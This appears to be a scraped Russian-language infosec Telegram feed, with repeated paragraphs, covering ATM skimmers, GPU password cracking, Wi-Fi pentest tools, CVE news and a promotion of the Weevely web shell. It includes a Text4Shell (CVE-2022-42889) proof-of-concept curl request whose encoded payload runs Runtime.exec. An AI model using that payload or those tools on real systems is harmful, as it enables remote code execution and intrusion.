Forwarded from 0•Bytes•1
All_5G.zip
26.5 MB
Статьи про атаки , угрозы , меры безопасности и подробную работу 5G , надеюсь вам будет полезно ❤️✨
Articles about attacks, threats, security measures and detailed operation of 5G, I hope you will find useful ✨❤️
#5g #network #mobile #attacks #protection
Articles about attacks, threats, security measures and detailed operation of 5G, I hope you will find useful ✨❤️
#5g #network #mobile #attacks #protection
Forwarded from T.Hunter
#news Не одним лишь фишингом данных с кредиток единым: скиммеры по-прежнему в деле и эволюционируют. На скрине новинка 2022-го на этом сомнительном поприще. Сканер толщиной в полмилиметра занимает слот для карточки и не мешает его работе. А камеры для записи пин-кода прячут в боковых и зеркальных панелях.
Банки в ответ ставят в слоты заглушки и камеры для распознавания скиммеров. Но они так и будут в ходу, пока есть нужда в обратной совместимости и нет повсеместного бесконтакта. И одинокий банкомат в тёмном переулке субботним вечером может оказаться с неприятным сюрпризом.
@tomhunter
Банки в ответ ставят в слоты заглушки и камеры для распознавания скиммеров. Но они так и будут в ходу, пока есть нужда в обратной совместимости и нет повсеместного бесконтакта. И одинокий банкомат в тёмном переулке субботним вечером может оказаться с неприятным сюрпризом.
@tomhunter
Forwarded from NETRUNNER GROUP (Сергей Зыбнев)
#ЦиклСтатей_HTB
Writeup HackTheBox Shoppy [EASY]
Доброго времени суток, сегодня мы разберем машину Shoppy на Hack The Box из категории Easy.
Writeup HackTheBox Shoppy [EASY]
Доброго времени суток, сегодня мы разберем машину Shoppy на Hack The Box из категории Easy.
Telegraph
Writeup shoppy.htb [EASY]
Сканирование Для начала закинем машинку в /etc/hosts. Посмотрим на сервисы, запущенные на машине: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) 80/tcp open http nginx 1.23.1 Посканим на возможные поддомены утилитой…
Forwarded from RESOLUTE ATTACK
🔥Инвентарь инструментов киберсека от Rawsec
Ссылка - https://inventory.raw.pm/tools.html
Ссылка - https://inventory.raw.pm/tools.html
Tadn3wb | E7 SUBCRIBEForwarded from IT CHEF: Новости, кибербезопасность
Не только для игр: восемь GeForce RTX 4090 вскрывают 8-значный пароль за 48 минут
GeForce RTX 4090 – стойка из восьми видеокарт, которая позволяет взломать восьмизначный пароль менее чем за час. О новинке рассказал ИБ-специалист Сэма Кроули, который выложил в своем Twitter результаты тестов по взлому паролей, проведенных на стойке.
Видеокарта отлично справляется даже с протоколом аутентификации Microsoft New Technology LAN Manager (NTLM) и Bcrypt. Все взломанные с помощью RTX 4090 пароли соответствовали актуальным методам безопасности и состояли из букв в случайном регистре, символов и цифр.
Для проведения тестов использовали HashCat V.6.2.6. Во всех типах атак, предусмотренных HashCat, видеокарта оказалась почти вдвое эффективнее RTX 3090.
#интересно
GeForce RTX 4090 – стойка из восьми видеокарт, которая позволяет взломать восьмизначный пароль менее чем за час. О новинке рассказал ИБ-специалист Сэма Кроули, который выложил в своем Twitter результаты тестов по взлому паролей, проведенных на стойке.
Видеокарта отлично справляется даже с протоколом аутентификации Microsoft New Technology LAN Manager (NTLM) и Bcrypt. Все взломанные с помощью RTX 4090 пароли соответствовали актуальным методам безопасности и состояли из букв в случайном регистре, символов и цифр.
Для проведения тестов использовали HashCat V.6.2.6. Во всех типах атак, предусмотренных HashCat, видеокарта оказалась почти вдвое эффективнее RTX 3090.
#интересно
👍2
#Tools
Сегодня я вам расскажу про комплексный инструмент для Wi-Fi пентеста. Он имеет довольно широкий функицонал
SniffAir – фреймворк для проведения пентеста Wi-Fi
Сегодня я вам расскажу про комплексный инструмент для Wi-Fi пентеста. Он имеет довольно широкий функицонал
SniffAir – фреймворк для проведения пентеста Wi-Fi
Telegraph
SniffAir – фреймворк для проведения пентеста Wi-Fi
SniffAir – это инфраструктура безопасности с открытым исходным кодом, которая позволяет легко анализировать пассивно собранные данные о беспроводных сетях, а также запускать сложные беспроводные атаки. https://github.com/Tylous/SniffAir SniffAir заботится…
❤1
#CVE #POC
Text4Shell CVE-2022-42889
CVE-2022-42889 Text4Shell affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10.
POC:
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D
Text4Shell CVE-2022-42889
CVE-2022-42889 Text4Shell affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10.
POC:
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D
#CheatSheet
При выполнении шагов перебора в ходе пентеста часто возникает необходимость передачи файлов на машину жертвы или с нее, например, для запуска пользовательских сценариев или дальнейшего анализа файлов на своей машине.
Сегодня я вам расскажу про передача файлов через консоль. Я написал исчерпывающую шпаргалку по теме передачи файлов через консоль.
При выполнении шагов перебора в ходе пентеста часто возникает необходимость передачи файлов на машину жертвы или с нее, например, для запуска пользовательских сценариев или дальнейшего анализа файлов на своей машине.
Сегодня я вам расскажу про передача файлов через консоль. Я написал исчерпывающую шпаргалку по теме передачи файлов через консоль.
Telegraph
Передача файлов через консоль
При выполнении шагов перебора в ходе пентеста часто возникает необходимость передачи файлов на машину жертвы или с нее, например, для запуска пользовательских сценариев или дальнейшего анализа файлов на своей машине. Существуют различные техники и инструменты…
Forwarded from IT CHEF: Новости, кибербезопасность
Apple запустила новый сайт для исследователей безопасности
Компания Apple представила новый сайт Apple Security Research, предназначенный для исследователей безопасности, которые хотят сообщить инженерам о найденных уязвимостях.
Сайт предоставляет инструменты для отправки отчётов о безопасности Apple, а также позволяет следить за обновлениями статуса заявки в режиме реального времени и общаться с инженерами Apple.
Согласно официальным данным, за последние 2,5 года Apple выплатила исследователям безопасности около $20 млн, при этом средняя сумма вознаграждений составила $40 000.
#интересно
Компания Apple представила новый сайт Apple Security Research, предназначенный для исследователей безопасности, которые хотят сообщить инженерам о найденных уязвимостях.
Сайт предоставляет инструменты для отправки отчётов о безопасности Apple, а также позволяет следить за обновлениями статуса заявки в режиме реального времени и общаться с инженерами Apple.
Согласно официальным данным, за последние 2,5 года Apple выплатила исследователям безопасности около $20 млн, при этом средняя сумма вознаграждений составила $40 000.
#интересно
Forwarded from Хакер | Этичный хакинг с Михаилом Тарасовым (Timcore)
#news
#exploit
#poc
В сети опубликован эксплоит для критической RCE-уязвимости в VMware Cloud Foundation
Опубликован PoC-эксплоит для критической уязвимости CVE-2021-39144, затрагивающей гибридную облачную платформу VMware Cloud Foundation и NSX Manager. Так как недавно обнаруженный и исправленный баг получил 9,8 балла из 10 возможных по шкале оценки уязвимостей CVSS, разработчики напоминают о необходимости скорейшей установки патчей.
Источник: https://xakep.ru/2022/10/31/cloud-foundation-poc/
#exploit
#poc
В сети опубликован эксплоит для критической RCE-уязвимости в VMware Cloud Foundation
Опубликован PoC-эксплоит для критической уязвимости CVE-2021-39144, затрагивающей гибридную облачную платформу VMware Cloud Foundation и NSX Manager. Так как недавно обнаруженный и исправленный баг получил 9,8 балла из 10 возможных по шкале оценки уязвимостей CVSS, разработчики напоминают о необходимости скорейшей установки патчей.
Источник: https://xakep.ru/2022/10/31/cloud-foundation-poc/
XAKEP
В сети опубликован эксплоит для критической RCE-уязвимости в VMware Cloud Foundation
Опубликован PoC-эксплоит для критической уязвимости CVE-2021-39144, затрагивающей гибридную облачную платформу VMware Cloud Foundation и NSX Manager. Так как недавно обнаруженный и исправленный баг получил 9,8 балла из 10 возможных по шкале оценки уязвимостей…
#ПО
Weevely
Это веб-shell, разработанная для целей пост-эксплуатации, которая может быть расширена по сети во время выполнения. Загрузите PHP-агент weevely на целевой веб-сервер, чтобы получить к нему удаленный доступ. Он имеет более 30 модулей для выполнения административных задач, поддержания доступа, обеспечения ситуационной осведомленности, повышения привилегий и распространения в целевой сети.
Фичи:
1. Shell доступ на целевой машине
2. SQL console pivoting на целевой машине
3. Пропуск HTTP/HTTPS трафика до цели через прокси
4. Загрузка и выгрузка файлов
5. Создание reverse или прямой TCP shell
6. Аудит безопасности удаленной машины
7. Сканирование портов с помощью pivoting на целевой машине
8. Подключение файловой системы удаленной машины
9. Pivoting SQL shell с локальной машины на целевую
10. Брутфорс внутренних служб
Weevely
Это веб-shell, разработанная для целей пост-эксплуатации, которая может быть расширена по сети во время выполнения. Загрузите PHP-агент weevely на целевой веб-сервер, чтобы получить к нему удаленный доступ. Он имеет более 30 модулей для выполнения административных задач, поддержания доступа, обеспечения ситуационной осведомленности, повышения привилегий и распространения в целевой сети.
Фичи:
1. Shell доступ на целевой машине
2. SQL console pivoting на целевой машине
3. Пропуск HTTP/HTTPS трафика до цели через прокси
4. Загрузка и выгрузка файлов
5. Создание reverse или прямой TCP shell
6. Аудит безопасности удаленной машины
7. Сканирование портов с помощью pivoting на целевой машине
8. Подключение файловой системы удаленной машины
9. Pivoting SQL shell с локальной машины на целевую
10. Брутфорс внутренних служб
Forwarded from Monkey Hacker
#cve202233679
Что такое Kerberos и что за CVE-2022-33679?
Решил разобраться с Kerberos, а тут еще новая вулна появилась с ней.
Данная вулна позволяет аутентифицироваться как другой пользователь, НО если пользователь был настроен на отключение стандартных требований предварительной аутентификации.
Читать тут...
Если кого-то интересует только CVE, то все полезные ресурсы вы найдете здесь:
🔘https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
🔘https://github.com/Bdenneu/CVE-2022-33679
Что такое Kerberos и что за CVE-2022-33679?
Решил разобраться с Kerberos, а тут еще новая вулна появилась с ней.
Данная вулна позволяет аутентифицироваться как другой пользователь, НО если пользователь был настроен на отключение стандартных требований предварительной аутентификации.
Читать тут...
Если кого-то интересует только CVE, то все полезные ресурсы вы найдете здесь:
🔘https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
🔘https://github.com/Bdenneu/CVE-2022-33679
Telegraph
Что такое Kerberos и что за CVE-2022-33679?
Основы Kerberos - это протокол для аутентификации запросов на обслуживание между доверенными узлами в недоверенной сети. Данный протокол достаточно широко распространен, а с момента выхода Windows 2000 компания Microsoft использует протокол Kerberos в качестве…
#Android #Awesome
Android Security Awesome
В данном репозитории собраны материалы по безопасности Android-приложений, различные статьи, исследования, инструменты анализа и полезные библиотеки/инструменты для обеспечения безопасности приложений. Большая часть этого материала приходит из телеграм канала Mobile AppSec World и его подписчиков. Репозиторий регулярно обновляется и пополняется новыми материалами
Android Security Awesome
В данном репозитории собраны материалы по безопасности Android-приложений, различные статьи, исследования, инструменты анализа и полезные библиотеки/инструменты для обеспечения безопасности приложений. Большая часть этого материала приходит из телеграм канала Mobile AppSec World и его подписчиков. Репозиторий регулярно обновляется и пополняется новыми материалами
Доброго времени суток, подписчики! В последнее время задумался над ребрендингом канала дабы перевести его в статус авторского. Как вы на это смотрите?
Anonymous Poll
61%
Нам нравится контент, продолжай также!
20%
Давай чисто авторский контент!
18%
Давай авторский контент без ребрендинга
🐳4
Похек
Доброго времени суток, подписчики! В последнее время задумался над ребрендингом канала дабы перевести его в статус авторского. Как вы на это смотрите?
Доброго времени суток всем! С большим отрывом Вы выбрали вариант, продолжать делать контент без ребрендинга. Мне приятно увидеть такую статистику и то, что вы поддерживаете мой труд)
👍2
#Roadmap
API Security Checklist
Чек-лист наиболее важных контрмер безопасности при разработке, тестировании и выпуске API.
API Security Checklist
Чек-лист наиболее важных контрмер безопасности при разработке, тестировании и выпуске API.
👍2